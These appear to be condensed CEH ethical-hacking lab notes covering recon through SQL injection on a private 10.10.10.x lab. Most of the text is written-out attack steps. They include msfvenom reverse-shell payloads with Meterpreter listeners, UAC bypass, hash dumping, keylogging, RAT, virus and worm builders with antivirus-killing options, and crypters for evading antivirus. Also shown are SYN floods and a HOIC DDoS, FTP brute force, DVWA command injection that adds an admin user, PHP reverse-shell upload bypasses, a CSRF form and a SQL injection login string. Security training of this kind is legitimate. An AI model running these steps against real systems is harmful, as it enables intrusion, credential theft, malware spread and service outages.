Module 02: Footprinting and Reconnaissance Open Source Information Gathering Using Windows Command Line Utilities ping -c 3 10.10.10.10 ping www.xyz.com –f –l 1500 (Packet needs to be fragmented but DF set) ping www.xyz.com –f –l 1472 tracert www.xyz.com Collecting Information About a Target Website Using Firebug Firebug / developer tools Mirroring Website Using HTTrack Web Site Copier Advanced Network Route Tracing Using Path Analyzer Pro Timed trace Information Gathering Using Metasploit service postgresql start msfdb init service postgresql restart msfconsole db_status nmap -Pn -sS -A -oX Test 10.10.10.0/24 db_import Test hosts db_nmap -sS -A 10.10.10.16 services use scanner/smb/smb_version show options set RHOSTS 10.10.10.8-16 set THREADS 100 run hosts
Module 03: Scanning Networks UDP and TCP Packet Crafting Techniques using HPING3 hping3 -1 No ICMP hping3 -s SYN hping3 -c count hping3 --scan 1-1024 hping3 10.10.10.10 --udp --rand-source --data 500 hping3 -S 10.10.10.10 -p 80 -c 5 hping3 10.10.10.10 --flood e.g. hping3 --scan 1-3000 -S 10.10.10.10 hping3 10.10.10.10 --udp --rand-source --data 500 hping3 -S 10.10.10.10 -p 80 -c 5 Scanning The Network Using The Colasoft Packet Builder ARP Packet template, set Delta Time as 0.1 Send All Packets window, check the Burst Mode Basic Network Troubleshooting Using MegaPing Host scanner Port scanner Understanding Network Scanning Using Nmap nmap -O nmap --packet-trace Slow comprehensive scan Null scan Enable all advanced/aggressive options (-A) nmap -sN -T4 -A 10.10.10.10 Exploring Various Network Scanning Techniques TCP connect() scan uses a normal TCP connection to determine if a port is available. Xmas Scan involves sending TCP segments with the all flags sent in the packet header, generating packets that are illegal according to RFC 793. ACK Flag Scan involves sending ACK probe packet with random sequence number. UDP Scan involves sending a generic UDP packet to the target. IDLE Scan involves sending spoofed packets to a target. TCP Connect Scan nmap -sT -T3 -A 10.10.10.12 Xmas scan nmap -sX -T4 10.10.10.12 ACK Scan nmap -sA -v -T4 10.10.10.12 IDLE scan nmap -Pn -p 80 -sI 10.10.10.16 10.10.10.12 Ping sweep nmap -sP 10.10.10.* • TCP Connect Scan • Xmas Scan • ACK Flag Scan • UDP Scan • IDLE Scan Inverse TCP Flag Scan and Stealth Scan Scanning a Network Using NetScan Tools Pro Avoiding Scanning Detection using Multiple Decoy IP Addresses nmap -f 10.10.10.10 Scan with smaller mtu nmap -mtu 8 10.10.10.10 Decoy method nmap -D RND:10 10.10.10.10 Drawing Network Diagrams Using Network Topology Mapper Solarwinds network topology mapper Checking for Live Systems Using Angry IP Scanner Scanning hosts/ports (Windows tool) Scanning for Network Traffic Going Through a Computer’s Adapter Using IP-Tools Identify Target System OS with TTL and TCP Window Sizes using Wireshark Operating System (OS) IP Initial TTL TCP window size Linux (kernel 2.4 and 2.6) 64 5840 Google's customized Linux 64 5720 FreeBSD 64 65535 Windows XP 128 65535 Windows 7, Vista and Server 2008 128 8192 Cisco Router (IOS 12.4) 255 4128
Module 04: Enumeration NetBIOS Enumeration Using Global Network Inventory (Hosts, Ports, Services) Enumerating Network Resources Using Advanced IP Scanner (shutdown, radmin) Performing Network Enumeration Using SuperScan Enumerating Resources in a Local Machine Using Hyena Performing Network Enumeration Using NetBIOS Enumerator Enumerating a Network Using SoftPerfect Network Scanner Enumerating a Target Network using Nmap and Net Use nmap -O 10.10.10.12 You see that ports 135, 139, 445, etc. are open, and port 139 is using NetBIOS. Windows 2012, nbtstat –A 10.10.10.16 net use (to view the created null sessions/shared folders from your host) net use \\10.10.10.16\e ““\user:”” (create a null session) net use \\10.10.10.16\e ““/user:”” Enumerating Services on a Target Machine with Nmap nmap -sP 10.10.10.0/24 (ping sweep scan) nmap -sS 10.10.10.12 (stealthy SYN scan) nmap -sSV -O 10.10.10.12 (stealthy SYN scan with version detection along with OS detection) nmap -sSV -O 10.10.10.12 -oN Enumeration.txt SNMP Enumeration Using snmp_enum with Nmap & Metasploit nmap –sU –p 161 10.10.10.12 nmap -sU -p 161 --script=snmp-brute 10.10.10.12 (snmp-brute script will extract the SNMP community string from the target machine) msfconsole use auxiliary/scanner/snmp/snmp_login show options set RHOSTS 10.10.10.12 exploit use auxiliary/scanner/snmp/snmp_enum set RHOSTS 10.10.10.12 exploit LDAP Enumeration Using Active Directory Explorer (ADExplorer) Enumerating information from Windows and Samba host using Enum4linux enum4linux -u martin -p apple -U 10.10.10.12 (user list) enum4linux -u martin -p apple -o 10.10.10.12 (Operating System details) enum4linux -u martin -p apple -P 10.10.10.12 (Password Policy Information) enum4linux -u martin -p apple -G 10.10.10.12 (Groups details) enum4linux -u martin -p apple -S 10.10.10.12 (Share Policy Information)
Module 05: Vulnerability Analysis Vulnerability Analysis Using Nessus https://localhost:8834 Username: admin / Password: password Create a new policy Policy Templates > Advanced Scan Settings section, select Host Discovery from the DISCOVERY drop-down list. Turn off Ping the remote host option (toggle the blue switch to left). Select Port Scanning and check the Verify open TCP ports found by local port enumerators option. Setting section, select ADVANCED The Policy General Settings window with Advanced Setting Type appears. Set the values of Max number of TCP sessions per host and Max number of TCP sessions per scan as unlimited. Create a new scan with new policy. Schedule settings > turn off the Enabled switch, select Launch from the drop-down list to start the scan. CGI Scanning with Nikto Nikto is not a stealthy tool, it scans a webserver in the shortest time but will get logged in an IDS/IPS. nikto -h nikto -H nikto -h http://www.gs.com -Tuning 1
Module 06: System Hacking Dumping and Cracking SAM Hashes to Extract Plaintext Passwords The Security Account Manager (SAM) is a database file present on Windows machines that stores user accounts and security descriptors for users on a local computer. It stores users' passwords in a hashed format (in LM hash and NTLM hash). You need to have administrator access to dump the contents of the SAM file. cmd (administrator mode) wmic useraccount get name,sid PwDump7.exe > c:\hashes.txt replace the box symbols before each user ID with its respective User Name ophcrack\x86\ophcrack.exe Load PWDUMP file Table Selection window appears, select Vista free in the list and click Install. Crack. Creating and Using Rainbow Tables Winrtgen Add table Rainbow Table properties window appears. Select ntlm from Hash dropdown list. Set Min Len as 4, Max Len as 6 and Chain Count 4000000. Select loweralpha from Charset dropdown list (it depends upon Password) rcrack_gui.exe to launch the RainbowCrack File > Load NTLM Hashes from PWDUMP File Rainbow Table > Search Rainbow Table Auditing System Passwords Using L0phtCrack Password Auditing Wizard Choose Audit Type section appears, select Strong Password Audit Exploiting Client Side Vulnerabilities and Establishing a VNC Session msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86 -f exe LHOST=10.10.10.11 LPORT=444 -o /root/Desktop/Test.exe Share Test.exe with http msfconsole use multi/handler and press Enter. set payload windows/meterpreter/reverse_tcp and press Enter. set LHOST 10.10.10.11 and press Enter. set LPORT 444 and press Enter. run Download and run Test.exe in target Windows machine. observe that one session is created or opened in the Meterpreter shell. If the meterpreter command line does not start interacting with the victim machine automatically, type sessions -i 1 and press Enter to start interacting with the victim machine. meterpreter command line type sysinfo. run vnc TightVNC: window appears with the victim Desktop showing in the window. Escalating Privileges by Exploiting Client Side Vulnerabilities msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86 -e x86/shikata_ga_nai -b "\x00" LHOST=10.10.10.11 -f exe > Desktop/Exploit.exe Share Exploit.exe with http msfconsole use exploit/multi/handler and press Enter. set payload windows/meterpreter/reverse_tcp and press Enter. set LHOST 10.10.10.11 and press Enter. To start the listener, type exploit -j -z and press Enter. Download and run Exploit.exe in target Windows machine. observe that one session is created or opened in the Meterpreter shell. Type sessions -i 1 and press Enter to start interacting with the victim machine. getuid Type run post/windows/gather/smart_hashdump and press Enter. The command fails to dump the passowrd hashes because of insufficient privileges. We shall try to escalate the privileges by trying to bypass the user account control setting which is blocking you from gaining unrestricted access to the machine. You will now issue a getsystem command that attempts to elevate the user privileges. The command issued is getsystem -t 1 which uses the Service - Named Pipe Impersonation (In Memory/Admin) Technique. This command also fails to escalate the privileges in our case. background use exploit/windows/local/bypassuac_fodhelper show options set SESSION 1 set payload windows/meterpreter/reverse_tcp show options set LHOST 10.10.10.11 set TARGET 0 (0 is nothing but Exploit Target ID) exploit getuid Re-issue the getsystem command, in attempt to elevate privileges. Type getsystem and press Enter. Type getuid and press Enter. The meterpreter session is now running with SYSTEM privileges (NT AUTHORITY\SYSTEM) run post/windows/gather/smart_hashdump Hacking Windows 10 using Metasploit, and Post-Exploitation Using Meterpreter msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86 -e x86/shikata_ga_nai -b "\x00" LHOST=10.10.10.11 -f exe > Desktop/Backdoor.exe Share Backdoor.exe with http msfconsole use exploit/multi/handler and press Enter. set payload windows/meterpreter/reverse_tcp and press Enter. set LHOST 10.10.10.11 and press Enter. show options To start the listener, type exploit -j -z and press Enter. Download and run Backdoor.exe in target Windows machine. observe that one session is created or opened in the Meterpreter shell. Type sessions -i 1 and press Enter to start interacting with the victim machine. sysinfo ipconfig getuid pwd ls MACE attributes of secret.txt, type timestomp secret.txt -v cd C:\; pwd; ls; download bootmgr search -f pagefile.sys keyscan_start keyscan_dump idletime shutdown User System Monitoring and Surveillance Using Spytech SpyAgent Establish Remote Desktop Connection and install SpyAgent. Setup password=spytech Complete + Stealth Configuration Load on Windows Startup Start Monitoring To bring SpyAgent out of stealth mode press CTRL+Shift+Alt+M Web Activity Monitoring and Recording using Power Spy Establish Remote Desktop Connection and install Power Spy. Setup Power Spy Stealth Configuration Use Ctrl+Alt+X keys to unhide. Hiding Files Using NTFS Streams type c:\magic\calc.exe > c:\magic\readme.txt:calc.exe mklink backdoor.exe readme.txt:calc.exe Hiding Data Using White Space Steganography snow -C -m "My swiss bank account number is 45656684512263" -p "magic" readme.txt readme2.txt snow -C -p "magic" readme2.txt Image Steganography Using OpenStego (saves in .png) Image Steganography Using Quick Stego (saves in .bmp) Viewing, Enabling, and Clearing Audit Policies Using Auditpol auditpol /get /category:* auditpol /set /category:"system","account logon" /success:enable /failure:enable auditpol /get /category:* auditpol /clear /y auditpol /get /category:* Covert Channels using Covert_TCP In Kali Linux, cc -o covert_tcp covert_tcp.c Do the same in Ubuntu To start a listener, type ./covert_tcp –dest 10.10.10.9 –source 10.10.10.11 –source_port 9999 –dest_port 8888 –server –file /home/ubuntu/Desktop/receive/receive.txt In Kali Linux, Applications --> Sniffing & Spoofing and select Wireshark, monitor eth0 ./covert_tcp –dest 10.10.10.9 –source 10.10.10.11 -source_port 8888 –dest_port 9999 –file /root/Desktop/send/message.txt Covert_tcp changes header of the tcp packets and replaces it with the characters of the string one character at a time to send the message without being detected. If you examine the communication between Ubuntu and Kali machines, i.e. 10.10.10.11 and 10.10.10.9 you will find each character of the message string being sent in individual packets over the network. Hacking Windows Server 2012 with a Malicious Office Document Using TheFatRat In Kali Linux, open fatrat [06] Create Fud Backdoor 1000% with PwnWinds [Excelent] [3] Create exe file with apache + Powershell (FUD 100%) Set LHOST IP, LPORT(4444), Output file Choose Payload option, choose [ 3 ] windows/meterpreter/reverse_tcp by typing 3 Type 8 and press Enter to go to the application main menu [07] Create Backdoor For Office with Microsploit by typing 7 |2| The Microsoft Office Macro on Windows by typing 2 Set LHOST IP, LPORT(4444), Output file In Enter the message for the document body (ENTER = default):, leave it to default. In Are you want Use custom exe file backdoor (y/n) option type y. Type /root/TheFatRat/output/payload.exe as Path [ 3 ] windows/meterpreter/reverse_tcp by typing 3 Share the doc with web server. msfconsole Type use multi/handler and press Enter. Type set payload windows/meterpreter/reverse_tcp and press Enter. Type set LHOST 10.10.10.11 and press Enter. Type set LPORT 4444 and press Enter. run(start the listener) Windows 2012, open the shared document in MS Word. Enable Content in the Security Warning alert. In Kali Linux, observe that one session is created or opened in the Meterpreter shell. (if not type sessions -i 1) sysinfo Active Online Attack using Responder (LLMNR and NBT-NS) In Kali Linux, responder -I eth0 Windows 10 victim machine, run > type \\ceh-tools in the Open field and click OK. Leave the Windows 10 machine running and switch back to Kali Linux machine. When DNS resolution for this host fails, the machine will attempt to ask all other machines on the local network for the correct address via LLMNR on UDP/5355 or NBT-NS on UDP/137. An attacker can listen on a network for these LLMNR/NBT-NS broadcasts and respond to them. Responder will collect the access credential hashes of the user logged in the victim machine. By default Responder stores logs in usr/share/responder/logs. Crack passwords: john /usr/share/responder/logs/<file name of the logs.txt>
Module 07: Malware Threats Creating an HTTP Trojan and Remotely Controlling a Target Machine Using HTTP RAT In Windows 2016, run httprat.exe Uncheck send notification with ip address to mail. Set port 84 > Create In Windows 8, run created httpserver.exe (Check Task Manager for Httpserver (32bit)) In Windows 2016, Open Windows 8 IP in browser. z0mbie's HTTP_RAT Page appears. Creating a Trojan Server Using the GUI Trojan MoSucker In Windows 2012, run MoSucker CreateServer.exe, note the Connection-port Keylogger > Enable off-line keylogger Run MoSucker.exe, Fill IP and port of target. Share and run created server in target. Gaining Control over a Victim Machine Using njRAT In Windows 10, Turn on Windows Defender Firewall (Use recommended settings) In Windows 2016, run njRAT v0.7d.exe. Set port & start. njRAT GUI > Builder > Host IP, Copy To StartUp and Registry StartUp > Build (Test.exe) Share Test.exe with Windows 10 & run. njRAT gets a persistent connection. Obfuscating a Trojan Using SwayzCryptor and Making it Undetectable to Various Anti-Virus Programs One method to bypass AVs is to “crypt” (an abbreviation of “encrypt”) the malicious files using fully undetectable crypters (FUDs). Stay in previouse njRAT lab. In Windows 2016, run SwayzCryptor.exe File > Test.exe Start up, Mutex, and Disable UAC, and click Encrypt. Save as CryptedFile.exe Share CryptedFile.exe with Windows 2012 & run. njRAT gets a persistent connection. Creating a Server Using the ProRat Tool In Windows 10, run ProRat.exe. Create > Create ProRat Server (342 Kbayt) Set Server Port, Password, Victim Name. Check all options under 'Invisibility' Bind with file > MyCar.jpg Server Extensions > EXE (Has icon support) Create Server Share binder_server.exe with Windows 2012 & run. In ProRat, enter IP of Windows 2012 > Connect. Enter password of binder_server.exe ProRat gets a remote connection. Creating a Trojan Server Using Theef In Windows 2012, directly run trojan Server210.exe In Windows 10, run Client210.exe > Enter victim's IP > Connect Theef gets a remote connection. Creating a Virus Using the JPS Virus Maker Tool In Windows 2012, run jps.exe Check options embedded in the virus file are Disable Yahoo, Disable Internet Explorer, Disable Norton Anti Virus, Disable McAfee Anti Virus, Disable Taskbar, Disable Security Center, Disable Control Panel, Hide Windows Clock, Hide All Tasks in Taskmgr, Change Explorer Caption, Destroy Taskbar, Destroy Offlines (Y!Messenger), Destroy Audio Service, Terminate Windows and Auto Startup. Check Restart. Name after Install: Rundll32, Server name: Svchost.exe Create Virus! Check Change XP Password, Change Computer Name, Change IE Home Page. Enable Convert to Worm. Name: fedevi, Time: 1s. / Icon: JPG Create Virus! Svchost.exe created. Pack this virus with a binder or virus packager & send to target. Creating a Worm Using Internet Worm Maker Thing In Windows 2016, run Generator.exe Enter Worm name, author, version, message and output path. Check Compile To EXE Support Select Activate Payloads on Date, Chance of activating payloads: 5. Select Hide All Drives, Disable Task Manager, Disable keyboard, Disable Mouse, and Message Box. Enter Title and a Message, Icon: Information. Select Disable Regedit, Disable Explorer.exe and change Reg owner. Set Owner field, Change Reg Oragnisation & change Homepage. Select Disable Windows Security, Disable Norton Security, Uninstall Norton Script Blocking, Disable Macro Security, Disable Run command, Disable shutdown, Disable Logoff, Disable windows Updates, No Search Command, Swap Mouse Button, and Open Web Page. Select Change IE Title Bar, Change Win Media Player Txt, Open Cd Drives, Lock Workstation and Download File. Select Print Message, Disable System Restore, and Change NOD32 Text (enter respective texts.) Select Mute Speakers, Delete a Folder, Change Wallpaper, and CPU Monster. Select Change Time, and enter Hour and Min. Select Change Date check box, and enter DD, MM, and YY. Select Loop Sound, Hide Desktop, Disable Malware Remove, Disable Windows File Protection, Corrupt Antivirus, and Change Computer Name. Select Change Drive icon, Add To Context Menu, Change Clock Text, Keyboard Disco, and Add To Favorites. Select Exploit Windows Admin Lockout Bug and Blue Screen of Death. Select Infect Bat Files, under Infection Options; select Hide Virus Files, under Extras; and click Generate Worm, under Control Panel. worm.vbs is created. Virus Analysis using IDA In Windows 2016, run idademo73_windows.exe New > Viruses\Klez Virus Live!\face.exe IDA Pro Analysis > View > Graphs > Flow Chart View > Graphs > Function Calls Windows > Hex View-1 Windows > Structures Virus Analysis Using OllyDbg In Windows 2016, run OLLYDBG.EXE Open \Viruses\tini.exe View > Log View > Executable module View > Memory View > Threads Detecting Trojans In Windows 2016, run Tcpview.exe TCPView helps you analyze TCP and other ports. Run autoruns.exe, displays all the processes, dll’s, services, and so on. In Windows 10, run jv16 PowerTools, full user interface, Restart computer after done. Clean and Speedup My Computer, Check Registry Errors & fix by deleting. Main Tools > Control which programs start automatically Monitoring TCP/IP Connections Using the CurrPorts In Windows 2016, run njRAT v0.7d.exe. Set port & start. njRAT GUI > Builder > Host IP, Copy To StartUp and Registry StartUp > Build (Test.exe) Share Test.exe with Windows 10 & run. In Windows 10, Run CurrPorts (cports.exe) Observe malicious process server.exe on port 5552 Kill Processes Of Selected Ports OR Close Selected TCP Connections Removing Malware using Clamwin Previous lab required. In Windows 10, install ClamWin (Uncheck Download virus database file) Memory Scan, Scan C: Performing Registry Entry Monitoring In Windows 2016, Regshot-x64-Unicode.exe > Run as administrator Logs save as HTML document 1st Shot > Shot and Save Install some application (e.g. HashTool) 2nd shot > Shot and Save Compare Startup Program Monitoring Tool In Windows 2016, install WinPatrol(Check Start the application) Startup Programs > Observe entries IE Helpers > Observe toolbars and links Services > Observe Files Types > Observe (Info > Expand Info) Active Tasks > Observe running tasks
Module 08: Sniffing Sniffing Passwords using Wireshark In Windows 2016, Wireshark Start capture process. In Windows 10, Login to www.xyz.com In Windows 2016, Stop capture & save http.request.method == “POST” In Windows 2016, Remote Desktop Connection Connect to Windows 10 Services > Remote Packet Capture Protocol v.0 (experimental) > Start Disconnect the remote desktop connection In Windows 2016, Wireshark Capture > Options > Manage Interfaces > Remote Interfaces > Add Host (IP of Windows 10) / Port 2002 / Password Authentication Start capture process In Windows 10, Login to www.xyz.com In Windows 2016, Check Wireshark remotely captured traffic Analyzing a Network Using Capsa Network Analyzer In Windows 2016, Install Colasoft Capsa 10 Enterprise Demo IP Endpoint tab, easily find the nodes with the highest traffic volumes, and check if there is a multicast storm or broadcast storm in network Ideal for statistical analysis and anomaly detection Spoofing MAC Address Using SMAC Performing Man-in-the-Middle Attack using Cain & Abel In Windows 2016, Cain & Abel > Configure Sniffer tab > Select adapter > Start/Stop Sniffer (start) + in the toolbar > All hosts in my subnet + All Tests APR tab > topmost section in the right pane to activate the + icon First target (left) 10.10.10.10, second target (right, 10.10.10.12) Select & Start/Stop APR button (third icon from the left in the menu bar) In Windows Server 2012, ftp 10.10.10.10 with user/pass Cain & Abel > Passwords > FTP Detecting ARP Poisoning in a Switch Based Network In Windows 10, Cain & Abel > Configure Sniffer tab > Select adapter > Start/Stop Sniffer (start) + in the toolbar > Range (10.10.10.1-10.10.10.30) + All Tests APR tab > topmost section in the right pane to activate the + icon 10.10.10.16 (Windows Server 2016) and 10.10.10.11 (Kali Linux) Select & Start/Stop APR button (third icon from the left in the menu bar) In Kali Linux, hping3 10.10.10.16 -c 100000 In Windows 10, Wireshark Preferences > Protocols > ARP/RARP > Detect ARP request storms + Detect duplicate IP address configuration Select Adapter & start capture, after adequate time stop Analyze > Expert Information Detecting ARP Attacks with XArp Tool In Windows 2016, XArp Security level > aggressive Preform ARP Poisoning between Windows Server 2016 and Kali Linux using Cain & Abel XArp Alerts appear
Module 09: Social Engineering Sniffing Website Credentials Using Social Engineering Toolkit (SET) Social-Engineering Attacks Website Attack Vectors Credential Harvester Attack Method Site Cloner POST back in Harvester/Tabnabbing
Module 10: Denial-of-Service SYN Flooding a Target Host Using Metasploit nmap -p 21 [IP Address of target] msfconsole use auxiliary/dos/tcp/synflood show options Type set RHOST [IP Address of Windows 10] Type set RPORT 21 Type set SHOST [IP Address of Windows Server 2016] (spoofed) Type set TIMEOUT 20000 exploit In Windows 10, wireshark filter tcp.port == 21 SYN Flooding a Target Host Using hping3 launch hping3, navigate to Applications, click 01 - Information Gathering node, click Live Host Identification and click hping3 hping3 -S [IP Address of Windows 10] -a [IP Address of Kali Linux] -p 22 --flood In Windows 10, wireshark filter tcp.port == 22 Performing Distributed Denial of Service Attack Using High Orbit Ion Cannon (HOIC) Windows 2012, Windows 10 & Windows 8: Run HOIC as below. [Target] + Type the target URL http://[IP Address of the target machine] in the URL field, slide the power bar to High, select GenericBoost.hoic booster from the drop-down list, and click Add. Set the THREADS value to 20. FIRE TEH LAZER! Observe traffic with Wireshark in victim machine.
Module 11: Session Hijacking Session Hijacking Using the Zed Attack Proxy (ZAP) Windows 10, Chrome > Settings > Advanced > System > Open proxy settings Configure Proxy (Windows 2016 VM - 10.10.10.16:8080) Windows 2016, run ZAP (no persistence) Break tab allows you to modify a response or request when it has been caught by ZAP. Tools > Options > Local Proxies (Windows 2016 VM - 10.10.10.16:8080) Set break on all requests and responses from the tool bar of ZAP. Click "Submit and step to next request or response" to manipulate.
Module 12: Evading IDS Firewalls and Honeypots Detecting Intrusions Using Snort In Windows 2012, copy snort.conf, and paste it in C:\Snort\etc copy folders so_rules, preproc_rules, rules to C:\Snort cmd, snort. Initialization Complete message displays. Ctrl+C cmd, snort -W. Observe Ethernet Driver index number cmd, snort –dev –i <index number> Another cmd, ping 10.10.10.10, ping triggers a Snort alert close all cmds. Edit snort.conf in Notepad++ HOME_NET - 10.10.10.12 Set DNS_SERVERS, SMTP_SERVERS, HTTP_SERVERS, SQL_SERVERS, TELNET_SERVERS, and SSH_SERVERS RULE_PATH - C:\Snort\rules, SO_RULE_PATH - C:\Snort\so_rules, PREPROC_RULE_PATH - C:\Snort\preproc_rules WHITE_LIST_PATH, BLACK_LIST_PATH - C:\Snort\rules, Create white_list.rules & black_list.rules in C:\Snort\rules Step #4: Configure dynamic loaded libraries section (Line 238) dynamic preprocessor libraries - C:\Snort\lib\snort_dynamicpreprocessor base preprocessor (or dynamic) engine - C:\Snort\lib\snort_dynamicengine\sf_engine.dll Comment (#) dynamic rules libraries line (dynamicdetection) Step #5: Configure Preprocessors, Comment all the preprocessors line 325: Delete lzma keyword. Delete only lzma lines 504-509: Remove backslash (\) at the end of each line Comment lines 504-509 (add #) Step #6: Configure output plugins Set classification.config and reference.config (C:\Snort\etc\classification.config & reference.config) add output alert_fast: alerts.ids in line #533 for Snort to dump all logs to alerts.ids snort.conf, find and replace 'ipvar' string with 'var' Open C:\Snort\rules\icmp-info.rules file with Notepad++ Type alert icmp $EXTERNAL_NET any -> $HOME_NET 10.10.10.12 (msg:"ICMP-INFO PING"; icode:0; itype:8; reference:arachnids,135; reference:cve,1999-0265; classtype:bad-unknown; sid:472; rev:7;) in line 21 cmd, snort -i<index number> -A console -c C:\Snort\etc\snort.conf -l C:\Snort\log -K ascii error “Could not create the registry key,” then run cmd as an Administrator Windows 10, ping 10.10.10.12 -t Observe Snort triggers alarm. Ctrl+C to stop Snort Check C:\Snort\log\10.10.10.10\ICMP_ECHO.ids with Notepad++ Detecting Malicious Network Traffic Using HoneyBOT HoneyBOT is a medium interaction honeypot for windows. A honeypot creates a safe environment to capture and interact with unsolicited traffic on a network. HoneyBOT is an easyto-use solution that is ideal for network security research or as part of an early-warning IDS. In Windows 2016, IIS Manager > Connections > Server node > Expand Sites > Right click FTP > Manage FTP Site > Stop Install and run HoneyBOT In Kali Linux, ftp 10.10.10.16 Observe the traffic reported in HoneyBOT ports and remotes. Bypassing Windows Firewall Using Nmap Evasion Techniques In Windows 10, Turn on Windows Defender Firewall Advanced settings > Inbound Rules > New Rule > Custom Scope - Add Kali Linux (10.10.10.11) Action - Block the connection In Kali Linux, nmap 10.10.10.10 (1000 filtered ports) nmap -sS 10.10.10.10 (1000 filtered ports) nmap -T4 -A 10.10.10.10 - INTENSE Scan (1000 filtered ports) nmap -sP 10.10.10.0/24 - Ping sweep nmap -sI 10.10.10.12 10.10.10.10 - Zombie Scan (Lists open ports) Bypassing Firewall Rules Using HTTP/FTP Tunneling In Windows 2012, Disable IIS Admin Service and World Wide Web Publishing service Run htthost.exe, set password + Revalidate DNS names and Log Connections Application log > Check "Listener: listening at 0.0.0.0:80" In Windows 2016, Run > inetmgr Server node --> Expand Sites node --> Right click FTP --> Select Manage FTP Site --> Click Stop Windows Firewall > Advanced settings > Outbound Rules > New Rule Rule Type: Port > Protocol and Ports: TCP + All remote ports > Action: Block the connection > Profile: Domain, Private and Public Name: Port 21 Blocked Port 21 Blocked > Properties > Protocols and Ports > Remote Port: Specific Ports - 21 Port 21 Blocked > Disable Rule ftp 10.10.10.10 connects. Enable rule. ftp doesn't connect. Run httport3snfm.exe > Proxy tab > 10.10.10.12:80 > Misc. options, Bypass mode, select Remote host Use personal remote host at (blank = use public) > re-enter proxy details. Enter password set in proxy. Port mapping tab > Add > Local port:21 / Remote host: 10.10.10.10 / Remote port:21 HTTport Proxy tab > Start ftp 10.10.10.10 doesn't work but ftp 127.0.0.1 Bypassing Windows Firewall using Metasploit In Windows 2012, Turn on Windows Defender Firewall In Kali Linux, msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86 -e x86/shikata_ga_nai -b "\x00" LHOST=10.10.10.11 -f exe > Desktop/Backdoor.exe Share Backdoor.exe using web server msfconsole use exploit/multi/handler show options set payload windows/meterpreter/reverse_tcp set LHOST 10.10.10.11 show options exploit -j -z In Windows 2012, download Backdoor.exe & run In Kali Linux, A Meterpreter session is created. sessions -i sessions -i 1 execute -f cmd.exe -c -H shell netsh firewall show opmode netsh advfirewall set allprofiles state off (In Windows 2012, Verify firewall is off for all profiles) exit (back to the Meterpreter session) getsystem ps
Module 13: Hacking Web Servers Performing Web Server Reconnaissance using Skipfish skipfish -o /root/test -S /usr/share/skipfish/dictionaries/complete.wl http://[IP Address of Windows Server 2012]:8080 Footprinting a Web Server Using the httprecon Tool Windows tool Footprinting a Web Server Using ID Serve Cracking FTP Credentials Using Dictionary Attack nmap -p 21 10.10.10.10 hydra -L /root/Desktop/Wordlists/Usernames.txt -P /root/Desktop/Wordlists/Passwords.txt ftp://[IP Address of Windows 10] Uniscan Web Server Fingerprinting in Kali Linux uniscan -h uniscan -u http://10.10.10.12:8080/CEH -q uniscan -u http://10.10.10.12:8080/CEH -we uniscan -u http://10.10.10.12:8080/CEH -d /usr/share/uniscan/report
Module 14: Hacking Web Applications
Exploiting Parameter Tampering and XSS Vulnerabilities in Web Applications
Parameter tampering
Cross-site scripting (XSS or CSS) - inject client-side scripts
Enumerating and Hacking a Web Application Using WPScan and Metasploit
In Kali Linux, WPScan --url http://[IP Address of Windows Server 2012]:8080/CEH --enumerate u
msfconsole
use auxiliary/scanner/http/wordpress_login_enum
show options
set PASS_FILE /root/Desktop/Wordlists/Passwords.txt
set RHOSTS [IP Address of Windows Server 2012]
set RPORT 8080
set TARGETURI http://[IP Address of Windows Server 2012]:8080/CEH/
set USERNAME admin (or any user obtained with WPScan)
run
Exploiting Remote Command Execution Vulnerability to Compromise a Target Web Server
In Windows 10, open http://10.10.10.12:8080/dvwa
Command Injection > ping.
It blocks other cmds ( | hostname )
DVWA Security: Impossible > Low
Command Injection > ping.
It executes other cmds ( | hostname )
| whoami
| tasklist
| dir C:\
| net user
| net user Test /Add
| net user
| net user Test
| net localgroup Administrators Test /Add
| net user Test
Start --> Windows Accessories --> Remote Desktop Connection.
Auditing Web Application Framework Using Vega
In Kali Linux, Applications --> 03 - Web Application Analysis --> Vega
Injection Modules + Response Processing Modules
Website Vulnerability Scanning Using Acunetix WVS
Business Criticality - High
Full Scan/ OWASP Top 10/ Instant
Exploiting File Upload Vulnerability at Different Security Levels
In Kali Linux, msfvenom -p php/meterpreter/reverse_tcp lhost=10.10.10.11 lport=4444 -f raw
Use Leafpad to save payload in to upload.php
http://10.10.10.12:8080/dvwa/login.php
DVWA Security > Low
File Upload > upload.php
msfconsole
use multi/handler
show options
set payload php/meterpreter/reverse_tcp
set lhost 10.10.10.11
set lport 4444
run
http://10.10.10.12:8080/dvwa/hackable/uploads/upload.php
session is created automatically, if not: sessions -i 1
sysinfo
close all
DVWA Security > Medium
File Upload > upload.php returns error
Rename payload to upload.php.jpg
Setup Burp Suite as an intercepting proxy
Upload the file upload.php.jpg
In Burp Suite, rename filename to upload.php
Upload is success. Remove proxy from browser
msfconsole
use multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 10.10.10.11
set lport 4444
run
http://10.10.10.12:8080/dvwa/hackable/uploads/upload.php
session is created automatically, if not: sessions -i 1
sysinfo
close all
DVWA Security > High
File Upload > upload.php returns error
Rename payload back to upload.php
With a text editor, Put GIF98 as first line.
Rename payload to upload.jpg
Upload is success
DVWA > Command Injection
|copy C:\wamp64\www\DVWA\hackable\uploads\upload.jpg C:\wamp64\www\DVWA\hackable\uploads\shell.php
msfconsole
use multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 10.10.10.11
set lport 4444
run
http://10.10.10.12:8080/dvwa/hackable/uploads/shell.php
session is created automatically, if not: sessions -i 1
sysinfo
close all
Performing Cross-Site Request Forgery (CSRF) Attack (one-click attack or session riding)
In Windows 2012, http://10.10.10.12:8080/CEH/wp-login.php, Login as admin
Plugins > Wordpress Firewall 2 > Whitelist 10.10.10.12
In Kali Linux, wpscan -u http://10.10.10.12:8080/CEH --enumerate vp
Save this script as Security_Script.html
<form method="POST" action="http://10.10.10.12:8080/CEH/wp-admin/optionsgeneral.php?page=wordpress-firewall-2%2Fwordpress-firewall-2.php">
<script>alert("As an Admin, To enable additional security to your Website. Click Submit")</script>
<input type="hidden" name="whitelisted_ip[]" value="10.10.10.11" >
<input type="hidden" name="set_whitelist_ip" value="Set Whitelisted IPs" class="button-secondary">
<input type="submit">
</form>
Share Security_Script.html with Windows 2012(over smb:// share), open in WP logged in browser and click submit
Observe in Wordpress Firewall 2, Whitelisted IP changed to 10.10.10.11.
Module 15: SQL Injection
SQL Injection Attacks on an MS SQL Database
In Windows 2012, http://www.goodshopping.com Login
u: blah' or 1=1 --
